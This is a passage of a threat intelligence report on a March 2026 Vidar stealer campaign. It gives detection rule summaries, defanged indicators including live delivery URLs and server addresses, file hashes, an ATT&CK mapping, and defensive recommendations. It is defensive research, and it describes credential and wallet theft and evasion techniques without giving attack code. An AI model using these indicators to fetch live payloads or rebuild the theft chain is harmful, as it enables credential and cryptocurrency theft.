The randomized directory and filename defeat indicators keyed on a fixed staging path; they do not change the file's hash, so hash-based matching still works on the staged copy while it exists. The cleanup step removes the binary after execution, leaving minimal forensic artifacts on the endpoint (though the original digest.bin remains on the delivery server, and the staged copy may still be recoverable from unallocated space or from EDR file-creation telemetry).


Detection

YARA Detection Summary

Four detection rules were developed:

  1. Vidar_Stealer_Digest_Loader_March2026: Targets the main stealer binary via 7-Zip masquerade strings, browser credential format strings (Browsers/%s/%s/%s), cryptocurrency wallet patterns (Wallets/%s), Telegram path references, and imphash.

  2. Vidar_Go_Loader_March2026: Targets the Go loader via build ID, source path convicted/main.go, obfuscated function name patterns, Kubernetes/blockchain type name artifacts, and Go 1.25.0 version string.

  3. Vidar_HTA_Dropper_March2026: Targets the HTA dropper via the curl download command pattern, drop path svc22121d.exe, delivery URL, and VBScript execution indicators.

  4. Vidar_CMD_Dropper_March2026: Targets the CMD batch dropper via the staging path pattern, xcopy fallback logic, cleanup commands, and ping delay technique.

Suricata Detection Summary

Ten network detection rules covering:

  • HTTP GET requests for specific payload filenames (favicon.ico via curl, digest.bin, verif.hta, fix.cmd)
  • Connections to 188.137.224.0/24 on port 80
  • Vidar exfiltration patterns (system fingerprint strings, credential data in POST bodies)
  • WebDAV method detection (PUT/PROPFIND to delivery server -- indicates operator activity)
  • DNS queries for bestandzest[.]lol and arrocagipplus[.]com
  • AsyncRAT beacon patterns to .125:6000

IOCs (Defanged)

Network Indicators

188.137.224[.]103       # Primary delivery server (LIVE, open directory)
188.137.224[.]92        # Alternate delivery / Operator RDP (LIVE)
188.137.224[.]125       # AsyncRAT C2 - adjacent campaign (LIVE)
bestandzest[.]lol       # Suspicious adjacent domain (DEAD)
arrocagipplus[.]com     # Suspicious adjacent domain (LIVE)

Payload URLs

hxxp://188.137.224[.]103/favicon.ico     # Go loader
hxxp://188.137.224[.]103/digest.bin      # Vidar stealer
hxxp://188.137.224[.]103/verif.hta       # HTA dropper
hxxp://188.137.224[.]103/fix.cmd         # CMD dropper

File Hashes

Vidar Stealer (digest.bin):

SHA-256: 76005b67d11c0e89c76655b2ddc16f5bb778ee547f2a4c6fc2e2e1d7e2dde7d9
SHA-1:   10940bd935ccccef2d9c4aaae9bbb6f04ddcd0e0
MD5:     460f47938c04a6fdb9d2faeaf0b16c44
Imphash: 2f611bc63293ca885a70090be8df0f3b
SSDEEP:  12288:4e9TDZ1hSZ+gjWurE6q5u6Z8Axy9uyfjr2hzZzDNXv:nhSn/r1jg7

Go Loader (favicon.ico / cache.bin):

SHA-256: 1c83863bda00873d081eb525fff37080a4b262a9092ca00887ba56234b860273
SHA-1:   1752e656e0c810d2714c514770667f89d30d6d2e
MD5:     730d705a72665f08fb2d8dddfc7e6443
Imphash: d42595b695fc008ef2c56aabd8efd68e
SSDEEP:  49152:zR2JFtXzphcQKV+cIPQu15jCSrvzdzAj:zEd7WVUoEdr7

CMD Dropper (fix.cmd):

SHA-256: 98646e45842852d3e8e452f7281393c328655f91cec2cf542c41e981e343c2f9
MD5:     4940141a26a116fb7cd9691afa71ec3e

HTA Dropper (verif.hta):

SHA-256: a3e5d5f04adb29c7cfb294aa5aebe231920456e3c26691dc04eb23ffb9317ed8
MD5:     472e65165aa5490496d6ce1ec0ea67ff

Behavioral Indicators

Go Build ID:     RMg_dsFz6-8NMT9j_5pE/oJNfwy1xvjGuk4Jgf6F3/ZoIdinksb3mQHLVWHEFw/wUsEim1Jv2_CPamZYTXS
Go Source Path:  convicted/main.go
Drop Paths:      %TEMP%\u<random>\sv<random>t.exe
                 %TEMP%\svc22121d.exe
VERSION Rsrc:    Company="Igor Pavlov", Product="7-Zip", File="7zFM.exe", Version="23.03"
Word Salad:      "come management color face extension parser once order side they analyzer mark"

MITRE ATT&CK Mapping

Tactic                 Technique                                          ID           Application
Initial Access         Phishing: Spearphishing Link                       T1566.002    Victim directed to delivery server
Execution              User Execution: Malicious File                     T1204.002    Victim opens HTA or runs CMD
Execution              Command and Scripting Interpreter: VBScript        T1059.005    verif.hta VBScript downloader
Execution              Command and Scripting Interpreter: Windows CMD     T1059.003    fix.cmd batch dropper
Defense Evasion        Masquerading: Match Legitimate Name or Location    T1036.005    Vidar poses as 7-Zip File Manager
Defense Evasion        Obfuscated Files: Binary Padding                   T1027.001    1.1 MB word salad in RCDATA resource
Defense Evasion        Obfuscated Files or Information                    T1027        XOR-encrypted C2 URL in Go binary
Defense Evasion        Deobfuscate/Decode Files or Information            T1140        Go loader decrypts the URL at runtime
Defense Evasion        Indicator Removal: File Deletion                   T1070.004    CMD dropper deletes staged executable
Credential Access      Credentials from Web Browsers                      T1555.003    Chrome/Firefox/Opera/Brave/Edge harvesting
Credential Access      Steal Web Session Cookie                           T1539        cookies.sqlite, Web Data extraction
Credential Access      Unsecured Credentials: Credentials In Files        T1552.001    Telegram tdata, DPAPI secrets
Collection             Data from Local System                             T1005        Desktop/Documents/Downloads file theft
Collection             Data Staged                                        T1074        Aggregated before exfiltration
Discovery              System Information Discovery                       T1082        Computer/User/OS/CPU/RAM enumeration
Command and Control    Application Layer Protocol: Web Protocols          T1071.001    HTTP-based C2 communication
Command and Control    Web Service: Dead Drop Resolver                    T1102.001    Suspected Steam/Telegram C2 resolution
Exfiltration           Exfiltration Over C2 Channel                       T1041        HTTP POST data exfiltration
Impact                 Financial Theft                                    T1657        Cryptocurrency wallet theft

Actor Timeline

Date          Event                                                      Evidence
2026-02-04    arrocagipplus[.]com registered                             WHOIS
2026-02-15    bestandzest[.]lol registered                               WHOIS
2026-02-20    Vidar stealer binary compiled                              PE timestamp
2026-03-07    digest.bin + fix.cmd uploaded to delivery server           Open directory timestamps
2026-03-09    favicon.ico + verif.hta uploaded (Go loader chain added)   Open directory timestamps
2026-03-09    Go loader first submitted to MalwareBazaar                 MalwareBazaar first_seen
2026-03-10    Vidar stealer submitted to MalwareBazaar                   MalwareBazaar first_seen
2026-03-10    ThreatFox IOC submission for delivery server               ThreatFox first_seen
2026-03-10    Investigation initiated                                    This report

The 18-day gap between compilation (February 20) and deployment (March 7) suggests the operator either tested the binary in a controlled environment before deployment, or staged the payload while preparing the infrastructure.


Attribution Assessment

Confidence: LOW

No strong attribution indicators were recovered. The infrastructure is hosted in Germany on a Latvian provider, with no language artifacts in the malware or infrastructure. The source path convicted/main.go is intriguing but insufficient for attribution -- it could be a project codename, a reference to the purpose of the tool, or simply arbitrary.

The operator demonstrates intermediate sophistication -- the Go loader obfuscation and dual delivery chains show planning, but the open directory, exposed WebDAV, preserved Go symbols, unstripped binary, plaintext HTTP delivery, and concentration of all infrastructure in a single /24 represent fundamental OPSEC failures that would not be expected from an advanced threat actor.

OPSEC Failures Summary

  1. Open directory listing -- Complete payload inventory visible to the public
  2. WebDAV write access -- Upload methodology exposed to any scanner
  3. Single /24 for all infrastructure -- Delivery, RDP, and alternate servers share the same subnet
  4. Preserved Go source path -- convicted/main.go reveals project naming
  5. Preserved Go build ID -- Enables binary fingerprinting across samples
  6. Preserved .symtab section -- Full function names extractable
  7. Plaintext HTTP delivery -- No TLS on delivery server
  8. Exposed RDP -- Operator workstation at .92:3389 with self-signed cert

Defensive Recommendations

Immediate Priority

  1. Block 188.137.224.0/24 at the perimeter firewall -- every host observed in the subnet is attacker-operated or unexplained, and nothing in it has a business purpose
  2. Search proxy and DNS logs for any historical connections to 188.137.224[.]103 or .92
  3. Deploy all four YARA rules to endpoint detection platforms
  4. Deploy Suricata rules to network IDS/IPS
  5. Search for %TEMP%\svc22121d.exe or %TEMP%\u*\sv*t.exe on all endpoints
  6. Search for file hashes across the endpoint fleet

If Compromise Is Detected

  1. Assume all browser-stored credentials are compromised -- force password resets
  2. Check cryptocurrency wallets for unauthorized transactions
  3. Invalidate Telegram sessions (Settings > Devices > Terminate all other sessions)
  4. Review DPAPI-protected secrets for exposure
  5. Audit files in Desktop, Documents, and Downloads for sensitive data that may have been exfiltrated

Long-Term

  1. Consider blocking AS211381 entirely given documented multi-campaign abuse
  2. Implement detection for HTA files using curl.exe for downloads (uncommon legitimate pattern)
  3. Monitor MalwareBazaar for new Vidar samples with matching imphash or Go build ID
  4. Submit abuse report to Podaon SIA (abuse@podaon.com) and upstream transit providers

Published by Breakglass Intelligence -- Automated threat intelligence. Zero analyst fatigue.

Investigation conducted March 10, 2026. Infrastructure status reflects point-in-time observations.
